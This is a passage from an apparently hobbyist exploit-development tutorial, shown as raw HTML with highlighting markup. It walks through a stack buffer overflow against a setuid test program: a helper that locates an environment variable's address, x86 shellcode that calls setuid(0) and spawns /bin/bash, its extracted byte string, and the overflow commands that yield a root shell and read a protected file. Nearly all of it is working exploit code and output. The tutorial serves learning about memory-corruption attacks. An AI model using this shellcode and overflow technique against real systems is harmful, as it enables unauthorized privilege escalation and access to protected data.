class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"argv/spanspan class="p"[])/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"ptr/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"3/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: %s lt;environment variablegt; lt;target program namegt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"ptr/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getenv/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w" /spanspan class="cm"/* get env var location *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"ptr/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="p"(/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"])/spanspan class="w" /spanspan class="o"-/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"2/spanspan class="p"]))/spanspan class="o"*/spanspan class="mi"2/spanspan class="p";/spanspan class="w" /spanspan class="cm"/* adjust for program name *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;%s will be at %p/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"],/spanspan class="w" /spanspan class="n"ptr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pWe compile this application and run it with the relevent arguments:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spangcc -o getenvaddr getenvaddr.c/span span class="code-line"span class="gp"testuser@dev:~$ /span./getenvaddr SHELLCODE ./app/span span class="code-line"span class="go"SHELLCODE will be at 0xbffff774/span/span span class="code-line"/code/pre/div /td/tr/table pGreat! Nearly there, we've got the address of our shellcode now to use it. We will hijack the execution flow as we did before but this time we will point to the address of our environment variable:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ ./app $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;Aquot; * 528 + quot;\x74\xf7\xff\xbfquot;#39;/spanspan class="o")/span/span span class="code-line"span class="go"bash-4.2$ whoami/span/span span class="code-line"span class="go"testuser/span/span span class="code-line"span class="go"bash-4.2$ cat secret.txt/span/span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table pDamn! So it didn't work. It must be dropping privileges, no need to worry, but we now to to change our shellcode to run the setuid system call before executing execve and set the uid to 0 (or root) (for more information on setuid see a href="http://linux.die.net/man/2/setuid" target="_blank"man setuid/a). First we need to find out the sys call number:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spangrep setuid /usr/include/i386-linux-gnu/asm/unistd_32.h/span span class="code-line"span class="gp"#/spandefine __NR_setuid span class="m"23/span/span span class="code-line"span class="gp"#/spandefine __NR_setuid32 span class="m"213/span/span span class="code-line"/code/pre/div /td/tr/table pThe sys call number is 23 or 0x17 in hex, our modified shellcode is:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="c1"; run /bin/bash/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"global/spanspan class="w" /spanspan class="nv"_start/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"section/spanspan class="w" /spanspan class="nv".text/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"jmp/spanspan class="w" /spanspan class="nv"short/spanspan class="w" /spanspan class="nv"Call_shellcode/spanspan class="w" /spanspan class="c1"; jump to where our string is/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"shellcode:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"eax/spanspan class="p",/spanspan class="w" /spanspan class="nb"eax/spanspan class="w" /spanspan class="c1"; zero out eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x17/spanspan class="w" /spanspan class="c1"; put 23 into eax to setuid/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ebx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; zero out ebx/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; make the syscall setuid/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"eax/spanspan class="p",/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; zero out eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"pop/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; pop the address of our string into ebx/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; which is the first argument to execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"9/spanspan class="p"],/spanspan class="w" /spanspan class="nb"al/spanspan class="w" /spanspan class="c1"; put a 0 where the A is to null/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; terminate the /bin/bash string/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0xb/spanspan class="w" /spanspan class="c1"; put the sys call number 11 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"10/spanspan class="p"],/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; put a pointer to the beginning/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; of the string where the BBBB is/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; zero out the ecx register/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"14/spanspan class="p"],/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; replace the CCCC with 0000/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"lea/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"10/spanspan class="p"]/spanspan class="w" /spanspan class="c1"; load the address that used to/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; point to BBBB into ecx the second/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; argument to execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"lea/spanspan class="w" /spanspan class="nb"edx/spanspan class="p",/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"14/spanspan class="p"]/spanspan class="w" /spanspan class="c1"; load the address that used to/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; point to CCCC into edx the third/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; argument to execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"Call_shellcode:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"call/spanspan class="w" /spanspan class="nv"shellcode/spanspan class="w" /spanspan class="c1"; call the start of the actual application/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nl"shell:/spanspan class="w" /spanspan class="kd"db/spanspan class="w" /spanspan class="s"quot;/bin/bashABBBBCCCCquot;/spanspan class="w" /spanspan class="c1"; our string of/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; arguments to execve/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the same as before except I added a call to setuid before it starts setting up the call to execve. Let's first make sure it works:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spannasm -f elf32 -o shell2.o shell2.nasm/span span class="code-line"span class="gp"testuser@dev:~$ /spanld -o shell2 shell2.o/span span class="code-line"span class="gp"testuser@dev:~$ /spanobjdump -d ./shell2span class="p"|/spangrep span class="s1"#39;[0-9a-f]:#39;/spanspan class="p"|/spangrep -v span class="s1"#39;file#39;/spanspan class="p"|/spancut -f2 -d:span class="p"|/spancut -f1-6 -dspan class="s1"#39; #39;/spanspan class="p"|/spantr -s span class="s1"#39; #39;/spanspan class="p"|/spantr span class="s1"#39;\t#39;/span span class="s1"#39; #39;/spanspan class="p"|/spansed span class="s1"#39;s/ $//g#39;/spanspan class="p"|/spansed span class="s1"#39;s/ /\\x/g#39;/spanspan class="p"|/spanpaste -d span class="s1"#39;#39;/span -s span class="p"|/spansed span class="s1"#39;s/^/quot;/#39;/spanspan class="p"|/spansed span class="s1"#39;s/$/quot;/g#39;/span/span span class="code-line"span class="go"quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;/span/span span class="code-line"span class="gp"testuser@dev:~$ /spancat shellcode.c/span span class="code-line"span class="gp"#/spanincludelt;stdio.hgt;/span span class="code-line"span class="gp"#/spanincludelt;string.hgt;/span span class="code-line"/span span class="code-line"span class="go"unsigned char code[] = \/span/span span class="code-line"span class="go"quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;;/span/span span class="code-line"/span span class="code-line"span class="go"main()/span/span span class="code-line"span class="go"{/span/span span class="code-line"/span span class="code-line"span class="go" printf(quot;Shellcode Length: %d\nquot;, strlen(code));/span/span span class="code-line"/span span class="code-line"span class="go" int (*ret)() = (int(*)())code;/span/span span class="code-line"/span span class="code-line"span class="go" ret();/span/span span class="code-line"/span span class="code-line"span class="go"}/span/span span class="code-line"span class="gp"testuser@dev:~$ /spangcc -z execstack -o shellcode shellcode.c/span span class="code-line"span class="gp"testuser@dev:~$ /span./shellcode/span span class="code-line"span class="go"Shellcode Length: 57/span/span span class="code-line"span class="gp"testuser@dev:/home/testuser$/span/span span class="code-line"/code/pre/div /td/tr/table pThat seems to work, let's test it out:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanspan class="nb"export/span span class="nv"SHELLCODE/spanspan class="o"=/spanspan class="k"$(/spanpython -c span class="s1"#39;print quot;\x90quot; * 500 + quot;\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;#39;/spanspan class="k")/span/span span class="code-line"span class="gp"testuser@dev:~$ /span./getenvaddr SHELLCODE ./app/span span class="code-line"span class="go"SHELLCODE will be at 0xbffff76c/span/span span class="code-line"span class="gp"testuser@dev:~$ ./app $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;Aquot; * 528 + quot;\x6c\xf7\xff\xbfquot;#39;/spanspan class="o")/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanwhoami/span span class="code-line"span class="go"root/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spancat secret.txt/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"/code/pre/div /td/tr/table pPWNED!!! :-D/p h2Conclusion/h2 pIt's very important to understand that when you are developing exploits you are always going to run into problems, that is why I left the bit in here where I didn't get root access. You will fail over and over again but if you continue trying you will find a way to hack it in the end. /p pThis was one of the simplest examples possible but before continuing it is important that you are able to do this. Don't worry if you don't understand how the application execution was hijacked or how the stack works, I will explain all of that in later tutorials when it is absolutely necessary, this tutorial is already long enough without going into more depth./p pI hope you enjoyed reading this as much as I enjoyed writing it./p pHappy Hacking :-)/p